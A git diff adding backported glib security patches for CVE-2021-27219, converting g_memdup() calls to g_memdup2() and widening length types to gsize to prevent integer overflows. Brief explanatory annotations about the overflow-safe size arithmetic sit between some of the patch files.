+ iholder->next = iface_node_get_holders_L (iface);
+ iface_node_set_holders_W (iface, iholder);
+ iholder->instance_type = NODE_TYPE (node);
+- iholder->info = info ? g_memdup (info, sizeof (*info)) : NULL;
++ iholder->info = info ? g_memdup2 (info, sizeof (*info)) : NULL;
+ iholder->plugin = plugin;
+
+ /* create an iface entry for this type */
+@@ -1731,7 +1732,7 @@ type_iface_retrieve_holder_info_Wm (Type
+ INVALID_RECURSION ("g_type_plugin_*", iholder->plugin, NODE_NAME (iface));
+
+ check_interface_info_I (iface, instance_type, &tmp_info);
+- iholder->info = g_memdup (&tmp_info, sizeof (tmp_info));
++ iholder->info = g_memdup2 (&tmp_info, sizeof (tmp_info));
+ }
+
+ return iholder; /* we don't modify write lock upon returning NULL */
+@@ -2016,10 +2017,10 @@ type_iface_vtable_base_init_Wm (TypeNode
+ IFaceEntry *pentry = type_lookup_iface_entry_L (pnode, iface);
+
+ if (pentry)
+- vtable = g_memdup (pentry->vtable, iface->data->iface.vtable_size);
++ vtable = g_memdup2 (pentry->vtable, iface->data->iface.vtable_size);
+ }
+ if (!vtable)
+- vtable = g_memdup (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
++ vtable = g_memdup2 (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
+ entry->vtable = vtable;
+ vtable->g_type = NODE_TYPE (iface);
+ vtable->g_instance_type = NODE_TYPE (node);
+--- a/gobject/gtypemodule.c
++++ b/gobject/gtypemodule.c
+@@ -19,6 +19,7 @@
+
+ #include <stdlib.h>
+
++#include "gstrfuncsprivate.h"
+ #include "gtypeplugin.h"
+ #include "gtypemodule.h"
+
+@@ -436,7 +437,7 @@ g_type_module_register_type (GTypeModule
+ module_type_info->loaded = TRUE;
+ module_type_info->info = *type_info;
+ if (type_info->value_table)
+- module_type_info->info.value_table = g_memdup (type_info->value_table,
++ module_type_info->info.value_table = g_memdup2 (type_info->value_table,
+ sizeof (GTypeValueTable));
+
+ return module_type_info->type;
+--- a/gobject/tests/param.c
++++ b/gobject/tests/param.c
+@@ -2,6 +2,8 @@
+ #include <glib-object.h>
+ #include <stdlib.h>
+
++#include "gstrfuncsprivate.h"
++
+ static void
+ test_param_value (void)
+ {
+@@ -874,7 +876,7 @@ main (int argc, char *argv[])
+ test_path = g_strdup_printf ("/param/implement/subprocess/%d-%d-%d-%d",
+ data.change_this_flag, data.change_this_type,
+ data.use_this_flag, data.use_this_type);
+- test_data = g_memdup (&data, sizeof (TestParamImplementData));
++ test_data = g_memdup2 (&data, sizeof (TestParamImplementData));
+ g_test_add_data_func_full (test_path, test_data, test_param_implement_child, g_free);
+ g_free (test_path);
+ }
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
new file mode 100644
index 0000000000..6a3ac6b552
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
@@ -0,0 +1,298 @@
+Backport of:
+
+From 0736b7c1e7cf4232c5d7eb2b0fbfe9be81bd3baa Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:41:21 +0000
+Subject: [PATCH 04/11] glib: Use g_memdup2() instead of g_memdup() in obvious
+ places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()` or an existing `gsize`
+variable), so that they use `g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it
+
+In particular, this fixes an overflow within `g_bytes_new()`, identified
+as GHSL-2021-045 by GHSL team member Kevin Backhouse.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Fixes: GHSL-2021-045
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/gbytes.c | 6 ++++--
+ glib/gdir.c | 3 ++-
+ glib/ghash.c | 7 ++++---
+ glib/giochannel.c | 5 +++--
+ glib/gslice.c | 3 ++-
+ glib/gtestutils.c | 3 ++-
+ glib/gvariant.c | 7 ++++---
+ glib/gvarianttype.c | 3 ++-
+ glib/tests/array-test.c | 4 +++-
+ glib/tests/option-context.c | 6 ++++--
+ glib/tests/uri.c | 8 +++++---
+ 11 files changed, 35 insertions(+), 20 deletions(-)
+
+--- a/glib/gbytes.c
++++ b/glib/gbytes.c
+@@ -34,6 +34,8 @@
+
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
++
+ /**
+ * GBytes:
+ *
+@@ -95,7 +97,7 @@ g_bytes_new (gconstpointer data,
+ {
+ g_return_val_if_fail (data != NULL || size == 0, NULL);
+
+- return g_bytes_new_take (g_memdup (data, size), size);
++ return g_bytes_new_take (g_memdup2 (data, size), size);
+ }
+
+ /**
+@@ -499,7 +501,7 @@ g_bytes_unref_to_data (GBytes *bytes,
+ * Copy: Non g_malloc (or compatible) allocator, or static memory,
+ * so we have to copy, and then unref.
+ */
+- result = g_memdup (bytes->data, bytes->size);
++ result = g_memdup2 (bytes->data, bytes->size);
+ *size = bytes->size;
+ g_bytes_unref (bytes);
+ }
+--- a/glib/gdir.c
++++ b/glib/gdir.c
+@@ -37,6 +37,7 @@
+ #include "gconvert.h"
+ #include "gfileutils.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gtestutils.h"
+ #include "glibintl.h"
+
+@@ -112,7 +113,7 @@ g_dir_open_with_errno (const gchar *path
+ return NULL;
+ #endif
+
+- return g_memdup (&dir, sizeof dir);
++ return g_memdup2 (&dir, sizeof dir);
+ }
+
+ /**
+--- a/glib/ghash.c
++++ b/glib/ghash.c
+@@ -34,6 +34,7 @@
+ #include "gmacros.h"
+ #include "glib-private.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gatomic.h"
+ #include "gtestutils.h"
+ #include "gslice.h"
+@@ -962,7 +963,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+ if (hash_table->have_big_keys)
+ {
+ if (key != value)
+- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
+ /* Keys and values are both big now, so no need for further checks */
+ return;
+ }
+@@ -970,7 +971,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+ {
+ if (key != value)
+ {
+- hash_table->values = g_memdup (hash_table->keys, sizeof (guint) * hash_table->size);
++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (guint) * hash_table->size);
+ is_a_set = FALSE;
+ }
+ }
+@@ -998,7 +999,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+
+ /* Just split if necessary */
+ if (is_a_set && key != value)
+- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
+
+ #endif
+ }
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -35,7 +35,7 @@
+ #include <errno.h>
+
+ #include "giochannel.h"
+-
++#include "gstrfuncsprivate.h"
+ #include "gstrfuncs.h"
+ #include "gtestutils.h"
+ #include "glibintl.h"
+
+@@ -1673,10 +1674,10 @@ g_io_channel_read_line (GIOChannel *cha
+
+ /* Copy the read bytes (including any embedded nuls) and nul-terminate.
+ * `USE_BUF (channel)->str` is guaranteed to be nul-terminated as it’s a
+- * #GString, so it’s safe to call g_memdup() with +1 length to allocate
++ * #GString, so it’s safe to call g_memdup2() with +1 length to allocate
+ * a nul-terminator. */
+ g_assert (USE_BUF (channel));
+- line = g_memdup (USE_BUF (channel)->str, got_length + 1);
++ line = g_memdup2 (USE_BUF (channel)->str, got_length + 1);
+ line[got_length] = '\0';
+ *str_return = g_steal_pointer (&line);
+ g_string_erase (USE_BUF (channel), 0, got_length);
+--- a/glib/gslice.c
++++ b/glib/gslice.c
+@@ -41,6 +41,7 @@
+ #include "gmain.h"
+ #include "gmem.h" /* gslice.h */
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gutils.h"
+ #include "gtrashstack.h"
+ #include "gtestutils.h"
+@@ -350,7 +351,7 @@ g_slice_get_config_state (GSliceConfig c
+ array[i++] = allocator->contention_counters[address];
+ array[i++] = allocator_get_magazine_threshold (allocator, address);
+ *n_values = i;
+- return g_memdup (array, sizeof (array[0]) * *n_values);
++ return g_memdup2 (array, sizeof (array[0]) * *n_values);
+ default:
+ return NULL;
+ }
+--- a/glib/gtestutils.c
++++ b/glib/gtestutils.c
+@@ -49,6 +49,7 @@
+ #include "gpattern.h"
+ #include "grand.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gtimer.h"
+ #include "gslice.h"
+ #include "gspawn.h"
+@@ -3803,7 +3804,7 @@ g_test_log_extract (GTestLogBuffer *tbuf
+ if (p <= tbuffer->data->str + mlength)
+ {
+ g_string_erase (tbuffer->data, 0, mlength);
+- tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup (&msg, sizeof (msg)));
++ tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup2 (&msg, sizeof (msg)));
+ return TRUE;
+ }
+
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -33,6 +33,7 @@
+
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
+
+ /**
+ * SECTION:gvariant
+@@ -725,7 +726,7 @@ g_variant_new_variant (GVariant *value)
+ g_variant_ref_sink (value);
+
+ return g_variant_new_from_children (G_VARIANT_TYPE_VARIANT,
+- g_memdup (&value, sizeof value),
++ g_memdup2 (&value, sizeof value),
+ 1, g_variant_is_trusted (value));
+ }
+
+@@ -1229,7 +1230,7 @@ g_variant_new_fixed_array (const GVarian
+ return NULL;
+ }
+
+- data = g_memdup (elements, n_elements * element_size);
++ data = g_memdup2 (elements, n_elements * element_size);
+ value = g_variant_new_from_data (array_type, data,
+ n_elements * element_size,
+ FALSE, g_free, data);
+@@ -1908,7 +1909,7 @@ g_variant_dup_bytestring (GVariant *valu
+ if (length)
+ *length = size;
+
+- return g_memdup (original, size + 1);
++ return g_memdup2 (original, size + 1);
+ }
+
+ /**
+--- a/glib/gvarianttype.c
++++ b/glib/gvarianttype.c
+@@ -28,6 +28,7 @@
+
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
+
+ /**
+ * SECTION:gvarianttype
+@@ -1181,7 +1182,7 @@ g_variant_type_new_tuple (const GVariant
+ g_assert (offset < sizeof buffer);
+ buffer[offset++] = ')';
+
+- return (GVariantType *) g_memdup (buffer, offset);
++ return (GVariantType *) g_memdup2 (buffer, offset);
+ }
+
+ /**
+--- a/glib/tests/array-test.c
++++ b/glib/tests/array-test.c
+@@ -29,6 +29,8 @@
+ #include <string.h>
+ #include "glib.h"
+
++#include "gstrfuncsprivate.h"
++
+ /* Test data to be passed to any function which calls g_array_new(), providing
+ * the parameters for that call. Most #GArray tests should be repeated for all
+ * possible values of #ArrayTestData. */
+@@ -1917,7 +1919,7 @@ byte_array_new_take (void)
+ GByteArray *gbarray;
+ guint8 *data;
+
+- data = g_memdup ("woooweeewow", 11);
++ data = g_memdup2 ("woooweeewow", 11);
+ gbarray = g_byte_array_new_take (data, 11);
+ g_assert (gbarray->data == data);
+ g_assert_cmpuint (gbarray->len, ==, 11);
+--- a/glib/tests/option-context.c
++++ b/glib/tests/option-context.c
+@@ -27,6 +27,8 @@
+ #include <string.h>
+ #include <locale.h>
+
++#include "gstrfuncsprivate.h"
++
+ static GOptionEntry main_entries[] = {
+ { "main-switch", 0, 0,
+ G_OPTION_ARG_NONE, NULL,
+@@ -256,7 +258,7 @@ join_stringv (int argc, char **argv)
+ static char **
+ copy_stringv (char **argv, int argc)
+ {
+- return g_memdup (argv, sizeof (char *) * (argc + 1));
++ return g_memdup2 (argv, sizeof (char *) * (argc + 1));
+ }
+
+ static void
+@@ -2323,7 +2325,7 @@ test_group_parse (void)
+ g_option_context_add_group (context, group);
+
+ argv = split_string ("program --test arg1 -f arg2 --group-test arg3 --frob arg4 -z arg5", &argc);
+- orig_argv = g_memdup (argv, (argc + 1) * sizeof (char *));
++ orig_argv = g_memdup2 (argv, (argc + 1) * sizeof (char *));
+
+ retval = g_option_context_parse (context, &argc, &argv, &error);
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
new file mode 100644
index 0000000000..4f86522d00
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
@@ -0,0 +1,54 @@
+From 0cbad673215ec8a049b7fe2ff44b0beed31b376e Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 16:12:24 +0000
+Subject: [PATCH 05/11] gwinhttpfile: Avoid arithmetic overflow when
+ calculating a size
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The members of `URL_COMPONENTS` (`winhttp_file->url`) are `DWORD`s, i.e.
+32-bit unsigned integers. Adding to and multiplying them may cause them
+to overflow the unsigned integer bounds, even if the result is passed to
+`g_memdup2()` which accepts a `gsize`.
+
+Cast the `URL_COMPONENTS` members to `gsize` first to ensure that the
+arithmetic is done in terms of `gsize`s rather than unsigned integers.
+
+Spotted by Sebastian Dröge.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/win32/gwinhttpfile.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/gio/win32/gwinhttpfile.c b/gio/win32/gwinhttpfile.c
+index 3f8fbd838..e0340e247 100644
+--- a/gio/win32/gwinhttpfile.c
++++ b/gio/win32/gwinhttpfile.c
+@@ -410,10 +410,10 @@ g_winhttp_file_resolve_relative_path (GFile *file,
+ child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
+ child->vfs = winhttp_file->vfs;
+ child->url = winhttp_file->url;
+- child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
+- child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
+- child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
+- child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, ((gsize) winhttp_file->url.dwSchemeLength + 1) * 2);
++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, ((gsize) winhttp_file->url.dwHostNameLength + 1) * 2);
++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, ((gsize) winhttp_file->url.dwUserNameLength + 1) * 2);
++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, ((gsize) winhttp_file->url.dwPasswordLength + 1) * 2);
+ child->url.lpszUrlPath = wnew_path;
+ child->url.dwUrlPathLength = wcslen (wnew_path);
+ child->url.lpszExtraInfo = NULL;
+--
+GitLab
+
+
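The casts matter because the addition and multiplication would otherwise be performed in 32-bit DWORD arithmetic and could wrap before the result is widened. A minimal, hypothetical sketch of widening first (assumes a size_t wider than 32 bits):

```
#include <stddef.h>
#include <stdint.h>

/* (len + 1) * 2 computed in 32 bits can wrap; widening first keeps the
 * whole computation in size_t, the same reordering the patch applies to
 * the URL_COMPONENTS lengths. */
static size_t utf16_buf_bytes(uint32_t len_in_chars) {
    return ((size_t)len_in_chars + 1) * 2;
}
```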
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
new file mode 100644
index 0000000000..d8043f5e29
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
@@ -0,0 +1,101 @@
+From f9ee2275cbc312c0b4cdbc338a4fbb76eb36fb9a Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:49:00 +0000
+Subject: [PATCH 06/11] gdatainputstream: Handle stop_chars_len internally as
+ gsize
+
+Previously it was handled as a `gssize`, which meant that if the
+`stop_chars` string was longer than `G_MAXSSIZE` there would be an
+overflow.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gdatainputstream.c | 25 +++++++++++++++++--------
+ 1 file changed, 17 insertions(+), 8 deletions(-)
+
+diff --git a/gio/gdatainputstream.c b/gio/gdatainputstream.c
+index 2e7750cb5..2cdcbda19 100644
+--- a/gio/gdatainputstream.c
++++ b/gio/gdatainputstream.c
+@@ -27,6 +27,7 @@
+ #include "gioenumtypes.h"
+ #include "gioerror.h"
+ #include "glibintl.h"
++#include "gstrfuncsprivate.h"
+
+ #include <string.h>
+
+@@ -856,7 +857,7 @@ static gssize
+ scan_for_chars (GDataInputStream *stream,
+ gsize *checked_out,
+ const char *stop_chars,
+- gssize stop_chars_len)
++ gsize stop_chars_len)
+ {
+ GBufferedInputStream *bstream;
+ const char *buffer;
+@@ -952,7 +953,7 @@ typedef struct
+ gsize checked;
+
+ gchar *stop_chars;
+- gssize stop_chars_len;
++ gsize stop_chars_len;
+ gsize length;
+ } GDataInputStreamReadData;
+
+@@ -1078,12 +1079,17 @@ g_data_input_stream_read_async (GDataInputStream *stream,
+ {
+ GDataInputStreamReadData *data;
+ GTask *task;
++ gsize stop_chars_len_unsigned;
+
+ data = g_slice_new0 (GDataInputStreamReadData);
+- if (stop_chars_len == -1)
+- stop_chars_len = strlen (stop_chars);
+- data->stop_chars = g_memdup (stop_chars, stop_chars_len);
+- data->stop_chars_len = stop_chars_len;
++
++ if (stop_chars_len < 0)
++ stop_chars_len_unsigned = strlen (stop_chars);
++ else
++ stop_chars_len_unsigned = (gsize) stop_chars_len;
++
++ data->stop_chars = g_memdup2 (stop_chars, stop_chars_len_unsigned);
++ data->stop_chars_len = stop_chars_len_unsigned;
+ data->last_saw_cr = FALSE;
+
+ task = g_task_new (stream, cancellable, callback, user_data);
+@@ -1338,17 +1344,20 @@ g_data_input_stream_read_upto (GDataInputStream *stream,
+ gssize found_pos;
+ gssize res;
+ char *data_until;
++ gsize stop_chars_len_unsigned;
+
+ g_return_val_if_fail (G_IS_DATA_INPUT_STREAM (stream), NULL);
+
+ if (stop_chars_len < 0)
+- stop_chars_len = strlen (stop_chars);
++ stop_chars_len_unsigned = strlen (stop_chars);
++ else
++ stop_chars_len_unsigned = (gsize) stop_chars_len;
+
+ bstream = G_BUFFERED_INPUT_STREAM (stream);
+
+ checked = 0;
+
+- while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len)) == -1)
++ while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len_unsigned)) == -1)
+ {
+ if (g_buffered_input_stream_get_available (bstream) ==
+ g_buffered_input_stream_get_buffer_size (bstream))
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
new file mode 100644
index 0000000000..f183939c45
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
@@ -0,0 +1,76 @@
+From 2aaf593a9eb96d84fe3be740aca2810a97d95592 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:50:37 +0000
+Subject: [PATCH 07/11] gwin32: Use gsize internally in g_wcsdup()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows it to handle strings up to length `G_MAXSIZE` — previously
+it would overflow with such strings.
+
+Update the several copies of it identically.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gwin32registrykey.c | 34 ++++++++++++++++++++++++++--------
+ 1 file changed, 26 insertions(+), 8 deletions(-)
+
+diff --git a/gio/gwin32registrykey.c b/gio/gwin32registrykey.c
+index 548a94188..2eb67daf8 100644
+--- a/gio/gwin32registrykey.c
++++ b/gio/gwin32registrykey.c
+@@ -127,16 +127,34 @@ typedef enum
+ G_WIN32_REGISTRY_UPDATED_PATH = 1,
+ } GWin32RegistryKeyUpdateFlag;
+
++static gsize
++g_utf16_len (const gunichar2 *str)
++{
++ gsize result;
++
++ for (result = 0; str[0] != 0; str++, result++)
++ ;
++
++ return result;
++}
++
+ static gunichar2 *
+-g_wcsdup (const gunichar2 *str,
+- gssize str_size)
++g_wcsdup (const gunichar2 *str, gssize str_len)
+ {
+- if (str_size == -1)
+- {
+- str_size = wcslen (str) + 1;
+- str_size *= sizeof (gunichar2);
+- }
+- return g_memdup (str, str_size);
++ gsize str_len_unsigned;
++ gsize str_size;
++
++ g_return_val_if_fail (str != NULL, NULL);
++
++ if (str_len < 0)
++ str_len_unsigned = g_utf16_len (str);
++ else
++ str_len_unsigned = (gsize) str_len;
++
++ g_assert (str_len_unsigned <= G_MAXSIZE / sizeof (gunichar2) - 1);
++ str_size = (str_len_unsigned + 1) * sizeof (gunichar2);
++
++ return g_memdup2 (str, str_size);
+ }
+
+ /**
+--
+GitLab
+
+
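
The g_assert() added above keeps the byte-count computation from wrapping. A hedged worked example of the bound it enforces: the duplicate needs (str_len_unsigned + 1) * sizeof (gunichar2) bytes, and that product only fits in a gsize when str_len_unsigned <= G_MAXSIZE / sizeof (gunichar2) - 1, i.e. roughly G_MAXSIZE / 2 - 1 UTF-16 code units.

#include <glib.h>

/* Sketch only: can (len + 1) gunichar2 units be sized in bytes without
 * overflowing gsize? This is the condition the patch asserts. */
static gboolean
wcsdup_size_fits (gsize len)
{
  return len <= G_MAXSIZE / sizeof (gunichar2) - 1;
}
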
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
new file mode 100644
index 0000000000..ffafc35c07
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
@@ -0,0 +1,101 @@
+From ba8ca443051f93a74c0d03d62e70402036f967a5 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:58:32 +0000
+Subject: [PATCH 08/11] gkeyfilesettingsbackend: Handle long keys when
+ converting paths
+
+Previously, the code in `convert_path()` could not handle keys longer
+than `G_MAXINT`, and would overflow if that was exceeded.
+
+Convert the code to use `gsize` and `g_memdup2()` throughout, and
+change from identifying the position of the final slash in the string
+using a signed offset `i`, to using a pointer to the character (and
+`strrchr()`). This allows the slash to be at any position in a
+`G_MAXSIZE`-long string, without sacrificing a bit of the offset for
+indicating whether a slash was found.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 21 ++++++++++-----------
+ 1 file changed, 10 insertions(+), 11 deletions(-)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index cd5765afd..25b057672 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -33,6 +33,7 @@
+ #include "gfilemonitor.h"
+ #include "gsimplepermission.h"
+ #include "gsettingsbackendinternal.h"
++#include "gstrfuncsprivate.h"
+ #include "giomodule-priv.h"
+ #include "gportalsupport.h"
+
+@@ -145,8 +146,8 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+ gchar **group,
+ gchar **basename)
+ {
+- gint key_len = strlen (key);
+- gint i;
++ gsize key_len = strlen (key);
++ const gchar *last_slash;
+
+ if (key_len < kfsb->prefix_len ||
+ memcmp (key, kfsb->prefix, kfsb->prefix_len) != 0)
+@@ -155,38 +156,36 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+ key_len -= kfsb->prefix_len;
+ key += kfsb->prefix_len;
+
+- for (i = key_len; i >= 0; i--)
+- if (key[i] == '/')
+- break;
++ last_slash = strrchr (key, '/');
+
+ if (kfsb->root_group)
+ {
+ /* if a root_group was specified, make sure the user hasn't given
+ * a path that ghosts that group name
+ */
+- if (i == kfsb->root_group_len && memcmp (key, kfsb->root_group, i) == 0)
++ if (last_slash != NULL && (last_slash - key) == kfsb->root_group_len && memcmp (key, kfsb->root_group, last_slash - key) == 0)
+ return FALSE;
+ }
+ else
+ {
+ /* if no root_group was given, ensure that the user gave a path */
+- if (i == -1)
++ if (last_slash == NULL)
+ return FALSE;
+ }
+
+ if (group)
+ {
+- if (i >= 0)
++ if (last_slash != NULL)
+ {
+- *group = g_memdup (key, i + 1);
+- (*group)[i] = '\0';
++ *group = g_memdup2 (key, (last_slash - key) + 1);
++ (*group)[(last_slash - key)] = '\0';
+ }
+ else
+ *group = g_strdup (kfsb->root_group);
+ }
+
+ if (basename)
+- *basename = g_memdup (key + i + 1, key_len - i);
++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
+
+ return TRUE;
+ }
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
new file mode 100644
index 0000000000..8efb7c720f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
@@ -0,0 +1,100 @@
+From 65ec7f4d6e8832c481f6e00e2eb007b9a60024ce Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:00:53 +0000
+Subject: [PATCH 09/11] =?UTF-8?q?gsocket:=20Use=20gsize=20to=20track=20nat?=
+ =?UTF-8?q?ive=20sockaddr=E2=80=99s=20size?=
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Don’t use an `int`, that’s potentially too small. In practical terms,
+this is not a problem, since no socket address is going to be that big.
+
+By making these changes we can use `g_memdup2()` without warnings,
+though. Fewer warnings is good.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gsocket.c | 16 ++++++++++------
+ 1 file changed, 10 insertions(+), 6 deletions(-)
+
+--- a/gio/gsocket.c
++++ b/gio/gsocket.c
+@@ -75,6 +75,7 @@
+ #include "gcredentialsprivate.h"
+ #include "glibintl.h"
+ #include "gioprivate.h"
++#include "gstrfuncsprivate.h"
+
+ #ifdef G_OS_WIN32
+ /* For Windows XP runtime compatibility, but use the system's if_nametoindex() if available */
+@@ -174,7 +175,7 @@ static gboolean g_socket_datagram_ba
+ GError **error);
+
+ static GSocketAddress *
+-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len);
++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len);
+
+ static gssize
+ g_socket_receive_message_with_timeout (GSocket *socket,
+@@ -260,7 +261,7 @@ struct _GSocketPrivate
+ struct {
+ GSocketAddress *addr;
+ struct sockaddr *native;
+- gint native_len;
++ gsize native_len;
+ guint64 last_used;
+ } recv_addr_cache[RECV_ADDR_CACHE_SIZE];
+ };
+@@ -5259,14 +5260,14 @@ g_socket_send_messages_with_timeout (GSo
+ }
+
